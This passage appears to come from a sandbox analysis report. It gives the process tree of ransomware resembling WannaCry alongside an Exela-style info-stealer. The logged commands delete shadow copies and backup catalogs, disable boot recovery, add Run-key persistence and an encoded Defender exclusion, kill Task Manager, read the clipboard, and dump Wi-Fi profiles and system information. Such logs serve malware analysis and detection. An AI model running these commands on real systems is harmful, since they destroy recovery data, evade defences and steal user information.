  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:5132
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:1044
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 86231744641035.bat
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:6124
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe //nologo m.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:5496
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s F:\$RECYCLE
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1512
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected] co
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2460
  - - C:\Users\Admin\AppData\Roaming\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:6104
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @[email protected] vs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2560
  - - C:\Users\Admin\AppData\Roaming\@[email protected]
      @[email protected] vs
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:5380
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5880
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4384
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6092
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:5160
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+buy+bitcoin
      4⤵
      PID:2988
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ecvwkmllmsw805" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\tasksche.exe\"" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4980
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ecvwkmllmsw805" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\tasksche.exe\"" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3924
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4660
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:5308
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5348
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3028
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:6000
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1920
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:2472
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:4800
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1020
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:944
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:1508
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2416
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3440
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:3336
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:116
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4484
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:9872
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:9888
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:10212
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:8756
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:8668
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:8568
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:8412
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:8428
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:8376
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:4104
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1820
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3060
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:10016
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5084
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:9740
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:8420
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:8448
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:8336
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:10200
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:9340
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:8844
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:7320
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:8240
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:9480
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:8872
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:8864
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4904
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:9520
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:916
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:1628
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:4288
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3564
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:724
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:7764
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:9836
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:2396
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:8880
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:8656
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:9344
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:7924
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6772
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:6328
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s F:\$RECYCLE
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:8892
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:7596
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:7612
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:6156
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:5768
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:10232
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:10220
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:9820
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5168
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:9520
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:6468
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6284
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:8248
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:6348
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4632
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:3848
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:3840
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:8276
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:2788
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:1524
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2104
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:3316
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:5212
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6064
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:6296
- - C:\Users\Admin\AppData\Roaming\taskse.exe
    taskse.exe C:\Users\Admin\AppData\Roaming\@[email protected]
    3⤵
    PID:4860
- - C:\Users\Admin\AppData\Roaming\@[email protected]
    @[email protected]
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4792
- - C:\Users\Admin\AppData\Roaming\taskdl.exe
    taskdl.exe
    3⤵
    PID:5224
- C:\Users\Admin\AppData\Roaming\Cyber Sniff.exe
  "C:\Users\Admin\AppData\Roaming\Cyber Sniff.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AaABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYgB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AbQB4ACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5112
- - C:\Users\Admin\AppData\Roaming\WindowsUpdateDaemon.exe
    "C:\Users\Admin\AppData\Roaming\WindowsUpdateDaemon.exe"
    3⤵
    - Executes dropped EXE
    PID:5080
- - C:\Users\Admin\AppData\Roaming\PACKED.exe
    "C:\Users\Admin\AppData\Roaming\PACKED.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1992
  - - C:\Users\Admin\AppData\Roaming\PACKED.exe
      "C:\Users\Admin\AppData\Roaming\PACKED.exe"
      4⤵
      Deletes itself
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3652
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:3504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5972
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:2372
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5840
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5668
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        5⤵
        
        PID:5632
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5996
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:5148
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5852
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        6⤵
        
        PID:4252
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:3616
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:4848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:4516
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:5000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM "taskmgr.exe""
        5⤵
        
        PID:6116
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM "taskmgr.exe"
        6⤵
        Kills process with taskkill
        
        PID:3380
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
        5⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:5648
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
        6⤵
        Views/modifies file attributes
        
        PID:5820
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"
        5⤵
        
        PID:5400
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f
        6⤵
        Adds Run key to start application
        
        PID:4148
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:608
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:3884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        5⤵
        
        PID:5508
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        6⤵
        
        PID:1204
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:1180
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        5⤵
        
        PID:1664
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        6⤵
        
        PID:1100
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:3180
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:4836
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:1160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:5112
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        6⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:4904
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        5⤵
        Network Service Discovery
        
        PID:2016
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:2988
      - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        6⤵
        
        PID:4656
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        6⤵
        Collects information from the system
        
        PID:3016
      - C:\Windows\system32\net.exe
        
        net user
        6⤵
        
        PID:3144
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        
        PID:3544
      - C:\Windows\system32\query.exe
        
        query user
        6⤵
        
        PID:3784
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        7⤵
        
        PID:4792
      - C:\Windows\system32\net.exe
        
        net localgroup
        6⤵
        
        PID:1096
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        
        PID:3380
      - C:\Windows\system32\net.exe
        
        net localgroup administrators
        6⤵
        
        PID:2860
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        7⤵
        
        PID:3688
      - C:\Windows\system32\net.exe
        
        net user guest
        6⤵
        
        PID:2100
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        7⤵
        
        PID:4668
      - C:\Windows\system32\net.exe
        
        net user administrator
        6⤵
        
        PID:1348
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        7⤵
        
        PID:4604
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        6⤵
        
        PID:944
      - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        6⤵
        Enumerates processes with tasklist
        
        PID:4584
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:3572
      - C:\Windows\system32\ROUTE.EXE
        
        route print
        6⤵
        
        PID:3928
      - C:\Windows\system32\ARP.EXE
        
        arp -a
        6⤵
        Network Service Discovery
        
        PID:1812
      - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        6⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:5076
      - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        6⤵
        Launches sc.exe
        
        PID:4188
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3444
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2384
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2080
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4848
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:708
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5196
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:4688
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:4612
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:1968
- - C:\Users\Admin\AppData\Roaming\CyberSniff.exe
    "C:\Users\Admin\AppData\Roaming\CyberSniff.exe"
    3⤵
    - Executes dropped EXE
    PID:4320

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe
1⤵
PID:5732
- C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe
  C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe
  2⤵
  - Executes dropped EXE
  PID:5916
- - C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe
    C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:2524

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:5244

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:6132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
